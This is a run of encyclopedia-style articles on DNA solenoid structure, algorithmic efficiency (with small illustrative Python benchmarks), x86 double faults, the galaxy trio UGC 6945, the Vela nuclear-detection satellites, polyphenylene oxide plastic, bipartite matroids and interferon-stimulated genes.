linker DNA and the fibre dimensions (instead there are two distinct classes). There is also data from experiments which cross-linked nucleosomes that shows a two-start structure. There is evidence that suggests both the solenoid and zig-zag (two-start) structures are present in 30 nm fibres. It is possible that chromatin structure may not be as ordered as previously thought, or that the 30 nm fibre may not even be present in situ. Two-start twisted-ribbon model The two-start twisted-ribbon model was proposed in 1981 by Worcel, Strogatz and Riley. This structure involves alternating nucleosomes stacking to form two parallel helices, with the linker DNA zig-zagging up and down the helical axis. Two-start cross-linker model The two-start cross-linker model was proposed in 1986 by Williams et al. This structure, like the two-start twisted-ribbon model, involves alternating nucleosomes stacking to form two parallel helices, but the nucleosomes are on opposite sides of the helices, with the linker DNA crossing the centre of the helical axis. Superbead model The superbead model was proposed by Renz in 1977. This structure is not helical like the other models; it instead consists of discrete globular structures along the chromatin which vary in size. Some alternative forms of DNA packaging The chromatin in mammalian sperm is the most condensed form of eukaryotic DNA; it is packaged by protamines rather than nucleosomes, whilst prokaryotes package their DNA through supercoiling.
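The packaging ratios quoted above can be sanity-checked with simple arithmetic. The sketch below is illustrative only: the compaction factors (about 7-fold for beads-on-a-string and 40-fold for the solenoid) and the 2 m / 6 μm figures are the ones given in this article, and real compaction varies by cell type and genome region.

```python
# Rough sanity check of the DNA packaging ratios quoted above.
dna_length_m = 2.0          # unwound DNA per human cell (metres)
nucleus_diameter_m = 6e-6   # mammalian nucleus diameter (~6 micrometres)

for name, factor in [("beads on a string", 7), ("solenoid (30 nm fibre)", 40)]:
    compacted = dna_length_m / factor
    print(f"{name}: {compacted * 100:.1f} cm")  # 28.6 cm and 5.0 cm

# Even the solenoid leaves ~5 cm of fibre, vastly longer than the nucleus,
# which is why tertiary structures (loops on a nuclear scaffold and
# ~700 nm supercoils) provide the further folding required.
required = dna_length_m / nucleus_diameter_m
print(f"overall linear compaction needed: ~{required:.0f}x")  # ~333333x
```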
External links Aaron Klug tells his life story at the Web of Stories: The Solenoid Model
Solenoid (DNA)
https://en.wikipedia.org/wiki/Algorithmic%20efficiency
In computer science, algorithmic efficiency is a property of an algorithm which relates to the amount of computational resources used by the algorithm. Algorithmic efficiency can be thought of as analogous to engineering productivity for a repeating or continuous process. For maximum efficiency it is desirable to minimize resource usage. However, different resources such as time and space complexity cannot be compared directly, so which of two algorithms is considered to be more efficient often depends on which measure of efficiency is considered most important. For example, bubble sort and timsort are both algorithms to sort a list of items from smallest to largest. Bubble sort organizes the list in time proportional to the number of elements squared (O(n²), see Big O notation), but only requires a small amount of extra memory which is constant with respect to the length of the list (O(1)). Timsort sorts the list in time linearithmic (proportional to a quantity times its logarithm) in the list's length (O(n log n)), but has a space requirement linear in the length of the list (O(n)). If large lists must be sorted at high speed for a given application, timsort is a better choice; however, if minimizing the memory footprint of the sorting is more important, bubble sort is a better choice. Background The importance of efficiency with respect to time was emphasized by Ada Lovelace in 1843 as applied to Charles Babbage's mechanical analytical engine: "In almost every computation a great variety of arrangements for the succession of the processes is possible, and various considerations must influence the selections amongst them for the purposes of a calculating engine. One essential object is to choose that arrangement which shall tend to reduce to a minimum the time necessary for completing the calculation" Early electronic computers had both limited speed and limited random access memory. Therefore, a space–time trade-off occurred. A task could use a fast algorithm using a lot of memory, or it could use a slow algorithm using little memory. The engineering trade-off was therefore to use the fastest algorithm that could fit in the available memory. Modern computers are significantly faster than early computers and have a much larger amount of memory available (gigabytes instead of kilobytes). Nevertheless, Donald Knuth emphasized that efficiency is still an important consideration: "In established engineering disciplines a 12% improvement, easily obtained, is never considered marginal and I believe the same viewpoint should prevail in software engineering" Overview An algorithm is considered efficient if its resource consumption, also known as computational cost, is at or below some acceptable level. Roughly speaking, 'acceptable' means: it will run in a reasonable amount of time or space on an available computer, typically as a function of the size of the input. Since the 1950s computers have seen dramatic increases in both the available computational power and in the available amount of memory, so current acceptable levels would have been unacceptable even 10 years ago. In fact, thanks to the approximate doubling of computer power every 2 years, tasks that are acceptably efficient on modern smartphones and embedded systems may have been unacceptably inefficient for industrial servers 10 years ago. Computer manufacturers frequently bring out new models, often with higher performance.
Software costs can be quite high, so in some cases the simplest and cheapest way of getting higher performance might be to just buy a faster computer, provided it is compatible with an existing computer. There are many ways in which the resources used by an algorithm can be measured: the two most common measures are speed and memory usage; other measures could include transmission speed, temporary disk usage, long-term disk usage, power consumption, total cost of ownership, response time to external stimuli, etc. Many of these measures depend on the size of the input to the algorithm, i.e. the amount of data to be processed. They might also depend on the way in which the data is arranged; for example, some sorting algorithms perform poorly on data which is already sorted, or which is sorted in reverse order. In practice, there are other factors which can affect the efficiency of an algorithm, such as requirements for accuracy and/or reliability. As detailed below, the way in which an algorithm is implemented can also have a significant effect on actual efficiency, though many aspects of this relate to optimization issues. Theoretical analysis In the theoretical analysis of algorithms, the normal practice is to estimate their complexity in the asymptotic sense. The most commonly used notation to describe resource consumption or "complexity" is Donald Knuth's Big O notation, representing the complexity of an algorithm as a function of the size of the input n. Big O notation is an asymptotic measure of function complexity, where O(f(n)) roughly means the time requirement for an algorithm is proportional to f(n), omitting lower-order terms that contribute less than f(n) to the growth of the function as n grows arbitrarily large. This estimate may be misleading when n is small, but is generally sufficiently accurate when n is large, as the notation is asymptotic. For example, bubble sort may be faster than merge sort when only a few items are to be sorted; however, either implementation is likely to meet performance requirements for a small list. Typically, programmers are interested in algorithms that scale efficiently to large input sizes, and merge sort is preferred over bubble sort for lists of the lengths encountered in most data-intensive programs. Some examples of Big O notation applied to algorithms' asymptotic time complexity include O(1) (constant time, e.g. indexing into an array), O(log n) (logarithmic, e.g. binary search), O(n) (linear, e.g. a single scan of the input), O(n log n) (linearithmic, e.g. merge sort) and O(n²) (quadratic, e.g. bubble sort). Measuring performance For new versions of software or to provide comparisons with competitive systems, benchmarks are sometimes used, which assist with gauging an algorithm's relative performance. If a new sort algorithm is produced, for example, it can be compared with its predecessors to ensure that it is at least as efficient as before with known data, taking into consideration any functional improvements. Benchmarks can be used by customers when comparing various products from alternative suppliers to estimate which product will best suit their specific requirements in terms of functionality and performance. For example, in the mainframe world certain proprietary sort products from independent software companies such as Syncsort compete with products from the major suppliers such as IBM for speed. Some benchmarks provide opportunities for producing an analysis comparing the relative speed of various compiled and interpreted languages; for example, The Computer Language Benchmarks Game compares the performance of implementations of typical programming problems in several programming languages.
Even creating "do it yourself" benchmarks can demonstrate the relative performance of different programming languages, using a variety of user specified criteria. This is quite simple, as a "Nine language performance roundup" by Christopher W. Cowell-Shah demonstrates by example. Implementation concerns Implementation issues can also have an effect on efficiency, such as the choice of programming language, or the way in which the algorithm is actually coded, or the choice of a compiler for a particular language, or the compilation options used, or even the operating system being used. In many cases a language implemented by an interpreter may be much slower than a language implemented by a compiler. See the articles on just-in-time compilation and interpreted languages. There are other factors which may affect time or space issues, but which may be outside of a programmer's control; these include data alignment, data granularity, cache locality, cache coherency, garbage collection, instruction-level parallelism, multi-threading (at either a hardware or software level), simultaneous multitasking, and subroutine calls. Some processors have capabilities for vector processing, which allow a single instruction to operate on multiple operands; it may or may not be easy for a programmer or compiler to use these capabilities. Algorithms designed for sequential processing may need to be completely redesigned to make use of parallel processing, or they could be easily reconfigured. As parallel and distributed computing grow in importance in the late 2010s, more investments are being made into efficient high-level APIs for parallel and distributed computing systems such as CUDA, TensorFlow, Hadoop, OpenMP and MPI. Another problem which can arise in programming is that processors compatible with the same instruction set (such as x86-64 or ARM) may implement an instruction in different ways, so that instructions which are relatively fast on some models may be relatively slow on other models. This often presents challenges to optimizing compilers, which must have extensive knowledge of the specific CPU and other hardware available on the compilation target to best optimize a program for performance. In the extreme case, a compiler may be forced to emulate instructions not supported on a compilation target platform, forcing it to generate code or link an external library call to produce a result that is otherwise incomputable on that platform, even if it is natively supported and more efficient in hardware on other platforms. This is often the case in embedded systems with respect to floating-point arithmetic, where small and low-power microcontrollers often lack hardware support for floating-point arithmetic and thus require computationally expensive software routines to produce floating point calculations. Measures of resource usage Measures are normally expressed as a function of the size of the input . The two most common measures are: Time: how long does the algorithm take to complete? Space: how much working memory (typically RAM) is needed by the algorithm? This has two aspects: the amount of memory needed by the code (auxiliary space usage), and the amount of memory needed for the data on which the code operates (intrinsic space usage). For computers whose power is supplied by a battery (e.g. laptops and smartphones), or for very long/large calculations (e.g. supercomputers), other measures of interest are: Direct power consumption: power needed directly to operate the computer. 
Indirect power consumption: power needed for cooling, lighting, etc. Power consumption is growing in importance as a metric for computational tasks of all types and at all scales, ranging from embedded Internet of things devices to system-on-chip devices to server farms. This trend is often referred to as green computing. Less common measures of computational efficiency may also be relevant in some cases: Transmission size: bandwidth could be a limiting factor. Data compression can be used to reduce the amount of data to be transmitted. Displaying a picture or image (e.g. Google logo) can result in transmitting tens of thousands of bytes (48K in this case) compared with transmitting six bytes for the text "Google". This is important for I/O bound computing tasks. External space: space needed on a disk or other external memory device; this could be for temporary storage while the algorithm is being carried out, or it could be long-term storage needed to be carried forward for future reference. Response time (latency): this is particularly relevant in a real-time application when the computer system must respond quickly to some external event. Total cost of ownership: particularly if a computer is dedicated to one particular algorithm. Time Theory Analysis of algorithms, typically using concepts like time complexity, can be used to get an estimate of the running time as a function of the size of the input data. The result is normally expressed using Big O notation. This is useful for comparing algorithms, especially when a large amount of data is to be processed. More detailed estimates are needed to compare algorithm performance when the amount of data is small, although this is likely to be of less importance. Parallel algorithms may be more difficult to analyze. Practice A benchmark can be used to assess the performance of an algorithm in practice. Many programming languages have an available function which provides CPU time usage. For long-running algorithms the elapsed time could also be of interest. Results should generally be averaged over several tests. Run-based profiling can be very sensitive to hardware configuration and the possibility of other programs or tasks running at the same time in a multi-processing and multi-programming environment. This sort of test also depends heavily on the selection of a particular programming language, compiler, and compiler options, so algorithms being compared must all be implemented under the same conditions. Space This section is concerned with use of memory resources (registers, cache, RAM, virtual memory, secondary memory) while the algorithm is being executed. As with the time analysis above, the algorithm is analyzed, typically using space complexity analysis, to get an estimate of the run-time memory needed as a function of the size of the input data. The result is normally expressed using Big O notation. There are up to four aspects of memory usage to consider: The amount of memory needed to hold the code for the algorithm. The amount of memory needed for the input data. The amount of memory needed for any output data. Some algorithms, such as sorting, often rearrange the input data and do not need any additional space for output data. This property is referred to as "in-place" operation. The amount of memory needed as working space during the calculation. This includes local variables and any stack space needed by routines called during a calculation; this stack space can be significant for algorithms which use recursive techniques.
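As a minimal practical illustration of the space aspects just listed, the following Python sketch uses the standard library's tracemalloc module to compare the working space of an in-place sort with one that allocates a separate output list. The list size is an arbitrary illustrative choice.

```python
# Comparing traced peak memory of in-place vs copying sorts.
import tracemalloc

data = list(range(1_000_000, 0, -1))     # reverse-ordered input

# In-place: list.sort() rearranges the existing list, so only the
# algorithm's temporary working space shows up in the trace.
tracemalloc.start()
data.sort()
_, peak_in_place = tracemalloc.get_traced_memory()
tracemalloc.stop()

# Copying: sorted() builds a new output list, so the traced peak
# additionally includes roughly one whole copy of the input.
tracemalloc.start()
result = sorted(data)
_, peak_copy = tracemalloc.get_traced_memory()
tracemalloc.stop()

print(f"peak, in-place sort: {peak_in_place / 1e6:.1f} MB")
print(f"peak, copying sort:  {peak_copy / 1e6:.1f} MB")
```

The exact figures vary by interpreter version, but the copying variant's peak is consistently larger by about the size of the input list, matching the "in-place" distinction described above.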
Early electronic computers, and early home computers, had relatively small amounts of working memory. For example, the 1949 Electronic Delay Storage Automatic Calculator (EDSAC) had a maximum working memory of 1024 17-bit words, while the 1980 Sinclair ZX80 came initially with 1024 8-bit bytes of working memory. By the late 2010s, it was typical for personal computers to have between 4 and 32 GB of RAM, an increase of over 300 million times as much memory. Caching and memory hierarchy Modern computers can have relatively large amounts of memory (possibly gigabytes), so having to squeeze an algorithm into a confined amount of memory is not the kind of problem it used to be. However, the different types of memory and their relative access speeds can be significant: Processor registers are the fastest memory with the least amount of space. Most direct computation on modern computers occurs with source and destination operands in registers before being updated to the cache, main memory and virtual memory if needed. On a processor core, there are typically on the order of hundreds of bytes or fewer of register availability, although a register file may contain more physical registers than architectural registers defined in the instruction set architecture. Cache memory is the second fastest, and second smallest, available in the memory hierarchy. Caches are present in processors such as CPUs or GPUs, where they are typically implemented in static RAM, though they can also be found in peripherals such as disk drives. Processor caches often have their own multi-level hierarchy; lower levels are larger, slower and typically shared between processor cores in multi-core processors. In order to process operands in cache memory, a processing unit must fetch the data from the cache, perform the operation in registers and write the data back to the cache. This operates at speeds comparable to (about 2-10 times slower than) the CPU or GPU's arithmetic logic unit or floating-point unit if in the L1 cache. It is about 10 times slower if there is an L1 cache miss and it must be retrieved from and written to the L2 cache, and a further 10 times slower if there is an L2 cache miss and it must be retrieved from an L3 cache, if present. Main physical memory is most often implemented in dynamic RAM (DRAM). The main memory is much larger (typically gigabytes compared to ≈8 megabytes) than an L3 CPU cache, with read and write latencies typically 10-100 times slower. RAM is also increasingly implemented on-chip with processors, as CPU or GPU memory. Paged memory, often used for virtual memory management, is memory stored in secondary storage such as a hard disk, and is an extension to the memory hierarchy which allows use of a potentially larger storage space, at the cost of much higher latency, typically around 1000 times slower than a cache miss for a value in RAM. While originally motivated to create the impression of higher amounts of memory being available than were truly available, virtual memory is more important in contemporary usage for its time-space tradeoff and enabling the usage of virtual machines. Cache misses from main memory are called page faults, and incur huge performance penalties on programs. An algorithm whose memory needs will fit in cache memory will be much faster than an algorithm which fits in main memory, which in turn will be very much faster than an algorithm which has to resort to paging.
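The practical effect of these cache-speed differences can be demonstrated with a short experiment. The following sketch, which assumes NumPy is available, traverses the same row-major array first by rows and then by columns; the array size is an arbitrary illustrative choice.

```python
# Spatial locality demo: identical arithmetic, different memory order.
import time
import numpy as np

n = 4000
a = np.random.rand(n, n)      # C (row-major) order: rows are contiguous

t0 = time.perf_counter()
row_total = sum(a[i, :].sum() for i in range(n))   # contiguous, cache-friendly
t1 = time.perf_counter()
col_total = sum(a[:, j].sum() for j in range(n))   # strided, cache-hostile
t2 = time.perf_counter()

print(f"row-wise:    {t1 - t0:.3f} s")
print(f"column-wise: {t2 - t1:.3f} s")
print("totals agree:", np.isclose(row_total, col_total))
```

Both loops perform the same additions, yet on typical hardware the column-wise loop is noticeably slower, because each strided access pulls a fresh cache line from the slower levels of the memory hierarchy.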
Because of this, cache replacement policies are extremely important to high-performance computing, as are cache-aware programming and data alignment. To further complicate the issue, some systems have up to three levels of cache memory, with varying effective speeds. Different systems will have different amounts of these various types of memory, so the effect of algorithm memory needs can vary greatly from one system to another. In the early days of electronic computing, if an algorithm and its data would not fit in main memory then the algorithm could not be used. Nowadays the use of virtual memory appears to provide much more memory, but at the cost of performance. Much higher speed can be obtained if an algorithm and its data fit in cache memory; in this case minimizing space will also help minimize time. This is called the principle of locality, and can be subdivided into locality of reference, spatial locality, and temporal locality. An algorithm which will not fit completely in cache memory but which exhibits locality of reference may perform reasonably well. See also Analysis of algorithms—how to determine the resources needed by an algorithm Benchmark—a method for measuring comparative execution times in defined cases Best, worst and average case—considerations for estimating execution times in three scenarios Compiler optimization—compiler-derived optimization Computational complexity theory Computer performance—computer hardware metrics Empirical algorithmics—the practice of using empirical methods to study the behavior of algorithms Optimization (computer science) Performance analysis—methods of measuring actual performance of an algorithm at run-time References Analysis of algorithms Computer performance Software optimization Software quality
Algorithmic efficiency
Technology
3,629
1,501,233
https://en.wikipedia.org/wiki/Double%20fault
On the x86 architecture, a double fault exception occurs if the processor encounters a problem while trying to service a pending interrupt or exception. An example situation when a double fault would occur is when an interrupt is triggered but the segment in which the interrupt handler resides is invalid. If the processor encounters a problem when calling the double fault handler, a triple fault is generated and the processor shuts down. As double faults can only happen due to kernel bugs, they are rarely caused by user space programs in a modern protected mode operating system, unless the program somehow gains kernel access (as some viruses and some low-level DOS programs do). Other processors, such as PowerPC or SPARC, generally save state to predefined and reserved machine registers. A double fault is then a situation where another exception happens while the processor is still using the contents of these registers to process the exception. SPARC processors have four levels of such registers, i.e. they have a 4-window register system. See also Triple fault Computer errors Central processing unit
Double fault
Technology
212
31,155,242
https://en.wikipedia.org/wiki/UGC%206945
UGC 6945 (also known as Arp 194) is a trio of interacting galaxies. The highly disrupted galaxy to the northwest is actually two galaxies in the advanced stages of merger, and has an angular size of . About 40″ to the southeast is a third galaxy with an angular size of . Based upon a radial velocity of about 10,500 km s−1, the interacting pair of galaxies at the northwest are located at a distance of from us (assuming a Hubble constant value of ). If we further assume that the third galaxy lies at the same distance away from us, we find that the galaxies are separated by a projected linear distance of roughly , though later findings from Hubble may cast this assumption into doubt (see below). As the pair of galaxies in the north gravitationally interact with each other, tidally-stripped gas from both galaxies is draped over the southern galaxy as a series of blobs, which are fueling a burst of star formation. While it has long been believed to be interacting with the northern galaxy, images from the Hubble Space Telescope clearly show that this stream of material is actually superimposed on the southern galaxy. This suggests that this third galaxy may actually lie in the background. Due to this uncertainty, the third galaxy may not be involved in the interaction. See also List of Hubble anniversary images References External links Spiral galaxies Interacting galaxies 6945 194 Ursa Major
UGC 6945
Astronomy
286
630,088
https://en.wikipedia.org/wiki/Vela%20%28satellite%29
Vela was the name of a group of satellites developed as the Vela Hotel element of Project Vela by the United States to detect nuclear detonations and monitor Soviet Union compliance with the 1963 Partial Test Ban Treaty. Vela started out as a small budget research program in 1959. It ended 26 years later as a successful, cost-effective military space system, which also provided scientific data on natural sources of space radiation. In the 1970s, the nuclear detection mission was taken over by the Defense Support Program (DSP) satellites. In the late 1980s, it was augmented by the Navstar Global Positioning System (GPS) satellites. The program is now called the Integrated Operational NuDet (Nuclear Detonation) Detection System (IONDS). Deployment Twelve satellites were built, six of the Vela Hotel design and six of the Advanced Vela design. The Vela Hotel series was to detect nuclear tests in space, while the Advanced Vela series was to detect nuclear explosions not only in space but also in the atmosphere. All spacecraft were manufactured by TRW and launched in pairs, on either Atlas–Agena or Titan III-C boosters. They were placed in orbits of 118,000 km (73,000 miles) to avoid particle radiation trapped in the Van Allen radiation belts. Their apogee was about one-third of the distance to the Moon. The first Vela Hotel pair was launched on 17 October 1963, one week after the Partial Test Ban Treaty went into effect, and the last in 1965. They had a design life of six months, but were not actually shut down until after five years. Advanced Vela pairs were launched in 1967, 1969, and 1970. They had a nominal design life of 18 months, later changed to seven years. However, the last satellite to be shut down was Vehicle 9 in 1984, which had been launched in 1969 and had lasted nearly 15 years. The Vela series began with the launch of Vela 1A and 1B on 17 October 1963, a flight also marking the maiden voyage of the Atlas-Agena SLV-3 vehicle. The second pair of satellites was launched on 17 July 1964, and the third on 20 July 1965. The last launch miscarried slightly when one Atlas vernier engine shut down at liftoff, while the other vernier operated at above-normal thrust levels. This resulted in a slightly lower than normal inclination for the satellites; however, the mission was carried out successfully. The problem was traced to a malfunction of the vernier LOX poppet valve. Subsequent Vela satellites were switched to the Titan IIIC booster due to their increased weight and complexity. Three more sets were launched on 28 April 1967, 23 May 1969, and 8 April 1970. The last pair of Vela satellites operated until 1985, when they were finally shut down; the Air Force claimed them to be the world's longest operating satellites. They remained in orbit until their orbits decayed at the end of 1992. Instruments The original Vela satellites were equipped with 12 external X-ray detectors and 18 internal neutron and gamma-ray detectors. They were equipped with solar panels generating 90 watts. The Advanced Vela satellites were additionally equipped with two non-imaging silicon photodiode sensors called bhangmeters, which monitored light levels over sub-millisecond intervals. They could determine the location of a nuclear explosion to within about 3,000 miles.
Atmospheric nuclear explosions produce a unique signature, often called a "double-humped curve": a short and intense flash lasting around 1 millisecond, followed by a second, much more prolonged and less intense emission of light taking a fraction of a second to several seconds to build up. The effect occurs because the surface of the early fireball is quickly overtaken by the expanding atmospheric shock wave composed of ionised gas. Although it emits a considerable amount of light itself, it is opaque and prevents the far brighter fireball from shining through. As the shock wave expands, it cools down and becomes more transparent, allowing the much hotter and brighter fireball to become visible again. No single natural phenomenon is known to produce this signature, although there was speculation that the Velas could record exceptionally rare natural double events, such as a meteoroid strike on the spacecraft producing a bright flash, or triggering on a lightning superbolt in the Earth's atmosphere, as may have occurred in the Vela incident. They were also equipped with sensors which could detect the electromagnetic pulse from an atmospheric explosion. Additional power was required for these instruments, and these larger satellites consumed 120 watts generated from solar panels. Serendipitously, the Vela satellites were the first devices ever to detect cosmic gamma-ray bursts. Role in discovering gamma-ray bursts On 2 July 1967, at 14:19 UTC, the Vela 4 and Vela 3 satellites detected a flash of gamma radiation unlike any known nuclear weapons signature. Uncertain what had happened but not considering the matter particularly urgent, the team at the Los Alamos Scientific Laboratory, led by Ray Klebesadel, filed the data away for investigation. As additional Vela satellites were launched with better instruments, the Los Alamos team continued to find inexplicable gamma-ray bursts in their data. By analyzing the different arrival times of the bursts as detected by different satellites, the team was able to determine rough estimates for the sky positions of sixteen bursts and definitively rule out a terrestrial or solar origin. Contrary to popular belief, the data was never classified. After thorough analysis, the findings were published in 1973 as an Astrophysical Journal article entitled "Observations of Gamma-Ray Bursts of Cosmic Origin". This alerted the astronomical community to the existence of gamma-ray bursts, now recognised as the most violent events in the universe. Vela 5A and 5B The scintillation X-ray detector (XC) aboard Vela 5A and its twin Vela 5B consisted of two 1 mm thick NaI(Tl) crystals mounted on photomultiplier tubes and covered by a 0.13 mm thick beryllium window. Electronic thresholds provided two energy channels, 3–12 keV and 6–12 keV. The XC detector aboard Vela 5A and 5B also discovered and announced the first X-ray burst ever reported; this announcement predated the initial announcement of the discovery of gamma-ray bursts by two years. In front of each crystal was a slat collimator providing a full width at half maximum (FWHM) aperture of c. 6.1 × 6.1 degrees. The effective detector area was c. 26 cm2. The detectors scanned a great circle every 60 seconds, and covered the whole sky every 56 hours.
Sensitivity to celestial sources was severely limited by the high intrinsic detector background, equivalent to about 80% of the signal from the Crab Nebula, one of the brightest sources in the sky at these wavelengths. The Vela 5B satellite X-ray detector remained functional for over ten years. Vela 6A and 6B Like the previous Vela 5 satellites, the Vela 6 nuclear test detection satellites were part of a program run jointly by the Advanced Research Projects Agency of the U.S. Department of Defense and the U.S. Atomic Energy Commission, managed by the U.S. Air Force. The twin spacecraft, Vela 6A and 6B, were launched on 8 April 1970. Data from the Vela 6 satellites were used to look for correlations between gamma-ray bursts and X-ray events. At least two good candidates were found, GB720514 and GB740723. The X-ray detectors failed on Vela 6B on 27 January 1972 and on Vela 6A on 12 March 1972. Controversial observations Some controversy still surrounds the Vela program. On 22 September 1979 the Vela 5B satellite (also known as Vela 10 and IRON 6911) detected the characteristic double flash of an atmospheric nuclear explosion near the Prince Edward Islands. Still unsatisfactorily explained, this event has become known as the Vela incident. President Jimmy Carter initially deemed the event to be evidence of a joint Israeli and South African nuclear test, though the now-declassified report of a scientific panel he subsequently appointed while seeking reelection concluded that it was probably not a nuclear explosion. In 2018, a new study concluded that the event was most likely a nuclear test conducted by Israel. An alternative explanation involves a magnetospheric event affecting the instruments. An earlier incident occurred when an intense solar storm on 4 August 1972 triggered the system into event mode as if an explosion had occurred, but this was quickly resolved by personnel monitoring the data in real time. See also Timeline of artificial satellites and space probes References External links Includes material from NASA Goddard's Remote Sensing Tutorial. Orbits (the orbital elements are not updated, as no reliable tracking information is being provided for these satellites. The orbits in the following links may be based on data from older epochs): 1963 in spaceflight Reconnaissance satellites of the United States Nuclear weapons testing Military space program of the United States Gamma-ray bursts Satellite series Military equipment introduced in the 1960s Measurement and signature intelligence
Vela (satellite)
Physics,Astronomy,Technology
1,884
28,413,819
https://en.wikipedia.org/wiki/Poly%28p-phenylene%20oxide%29
Poly(p-phenylene oxide) (PPO), poly(p-phenylene ether) (PPE), poly(oxy-2,6-dimethyl-1,4-phenylene), often referred to simply as polyphenylene oxide, is a high-temperature thermoplastic with the general formula (C8H8O)n. It is rarely used in its pure form due to difficulties in processing. It is mainly used as a blend with polystyrene, high-impact styrene-butadiene copolymer, or polyamide. PPO is a registered trademark of SABIC Innovative Plastics B.V. under which various polyphenylene ether resins are sold. History Polyphenylene ether was discovered in 1959 by Allan Hay, and was commercialized by General Electric in 1960. While it was one of the cheapest high-temperature resistant plastics, processing was difficult, and its impact and heat resistance gradually decreased over time. Mixing it with polystyrene, in any ratio, can compensate for these disadvantages. In the 1960s, modified PPE came onto the market under the trademark Noryl. Properties PPE is an amorphous high-performance plastic. The glass transition temperature is 215 °C, but it can be varied by mixing with polystyrene. Through chemical modification and the incorporation of fillers such as glass fibers, the properties can be extensively tailored. Applications PPE blends are used for structural parts, electronics, household and automotive items that depend on high heat resistance, dimensional stability and accuracy. They are also used in medicine for sterilizable instruments made of plastic. The PPE blends are characterized by hot water resistance with low water absorption, high impact strength, halogen-free fire protection and low density. This plastic is processed by injection molding or extrusion; depending on the type, the processing temperature is 260–300 °C. The surface can be printed, hot-stamped, painted or metallized. Welding is possible by means of heating elements, friction or ultrasonic welding. It can be glued with halogenated solvents or various adhesives. This plastic is also used to produce air separation membranes for generating nitrogen. The PPO is spun into a hollow fiber membrane with a porous support layer and a very thin outer skin. The permeation of oxygen occurs from inside to out across the thin outer skin with an extremely high flux. Due to the manufacturing process, the fiber has excellent dimensional stability and strength. Unlike hollow fiber membranes made from polysulfone, the fiber ages relatively quickly to a stable state, so that air separation performance remains stable throughout the life of the membrane. PPO's air separation performance is suitable for low-temperature applications where polysulfone membranes require heated air to increase permeation. Production from natural products Natural phenols can be enzymatically polymerized. Laccase and peroxidase induce the polymerization of syringic acid to give a poly(1,4-phenylene oxide) bearing a carboxylic acid at one end and a phenolic hydroxyl group at the other. References Translated from the article Polyphenylenether on the German Wikipedia. External links Molecular electronics Organic polymers Polyethers Organic semiconductors Engineering plastic Thermoplastics Diphenyl ethers
Poly(p-phenylene oxide)
Chemistry,Materials_science
702
36,886,954
https://en.wikipedia.org/wiki/Bipartite%20matroid
In mathematics, a bipartite matroid is a matroid all of whose circuits have even size. Example A uniform matroid U(r,n), of rank r on n elements, is bipartite if and only if r is an odd number, because the circuits in such a matroid have size r + 1. Relation to bipartite graphs Bipartite matroids were defined by Welsh as a generalization of the bipartite graphs, graphs in which every cycle has even size. A graphic matroid is bipartite if and only if it comes from a bipartite graph. Duality with Eulerian matroids An Eulerian graph is one in which all vertices have even degree; Eulerian graphs may be disconnected. For planar graphs, the properties of being bipartite and Eulerian are dual: a planar graph is bipartite if and only if its dual graph is Eulerian. As Welsh showed, this duality extends to binary matroids: a binary matroid is bipartite if and only if its dual matroid is an Eulerian matroid, a matroid that can be partitioned into disjoint circuits. For matroids that are not binary, the duality between Eulerian and bipartite matroids may break down. For instance, the uniform matroid U(4,6) is non-bipartite (its circuits have size five) but its dual U(2,6) is Eulerian, as it can be partitioned into two 3-element circuits. The self-dual uniform matroid U(3,6) is bipartite but not Eulerian, since its six elements cannot be partitioned into disjoint circuits of size four. Computational complexity It is possible to test in polynomial time whether a given binary matroid is bipartite. However, any algorithm that tests whether a given matroid is Eulerian, given access to the matroid via an independence oracle, must perform an exponential number of oracle queries, and therefore cannot take polynomial time. References Matroid theory
Bipartite matroid
Mathematics
373
44,939,434
https://en.wikipedia.org/wiki/Interferon-stimulated%20gene
An interferon-stimulated gene (ISG) is a gene that can be expressed in response to stimulation by interferon. Interferons bind to receptors on the surface of a cell, initiating protein signaling pathways within the cell. This interaction leads to the expression of a subset of genes involved in the innate immune system response. ISGs are commonly expressed in response to viral infection, but also during bacterial infection and in the presence of parasites. It is currently estimated that 10% of the human genome is regulated by interferons (IFNs). Interferon-stimulated genes can act as an initial response to pathogen invasion, slowing down viral replication and increasing expression of immune signaling complexes. There are three known types of interferon, with approximately 450 genes highly expressed in response to type I interferon. Type I interferon consists of IFN-α, IFN-β and IFN-ω and is expressed in response to viral infection. ISGs induced by type I interferon are associated with suppression of viral replication and increased expression of immune signaling proteins. Type II interferon consists only of IFN-γ and is associated with controlling intracellular pathogens and with tumor suppressor genes. Type III interferon consists of IFN-λ; it is associated with the antiviral immune response and is key in the anti-fungal neutrophil response. Expression ISGs are genes whose expression can be stimulated by interferon, but may also be stimulated by other pathways. Interferons are a type of protein called a cytokine, which is produced in response to infection. When released, they signal to infected cells and other nearby cells that a pathogen is present. This signal is passed from one cell to another by binding of the interferon to a cell surface receptor on a naïve cell. The receptor and interferon are taken inside the cell while bound to initiate expression of ISGs. Interferon activation of ISGs uses the JAK-STAT signaling pathway to induce transcription of ISGs. ISGs can be divided based on what class of interferon they are activated by: type I, type II, or type III interferon. The protein products of ISGs control pathogen infections. Specifically, type I and type III interferons are antiviral cytokines, triggering ISGs that combat viral infections. Type I interferons are also involved in bacterial infections; however, they can have both beneficial and harmful effects. The type II interferon class only has one cytokine (IFN-γ), which has some antiviral activity, but is more important in establishing cellular immunity through activating macrophages and promoting major histocompatibility complex (MHC) class II. All ISG stimulation pathways result in the production of transcription factors. Type I and type III interferons produce a protein complex called ISGF3, which acts as a transcription factor, and binds to a promoter sequence called ISRE (interferon-stimulated response element). Type II interferons produce a transcription factor called GAF, which binds to a promoter sequence called GAS. These interactions initiate gene expression. These pathways are also commonly initiated by a Toll-like receptor (TLR) on the cell surface. The number and type of ISGs expressed in response to infection is specific to the infecting pathogen. Families of interferon-stimulated genes IFIT family The IFIT family of ISGs is located on chromosome 10 in humans and has homologs in mammals, birds, and fish. The IFIT family is commonly induced by type I and type III interferon.
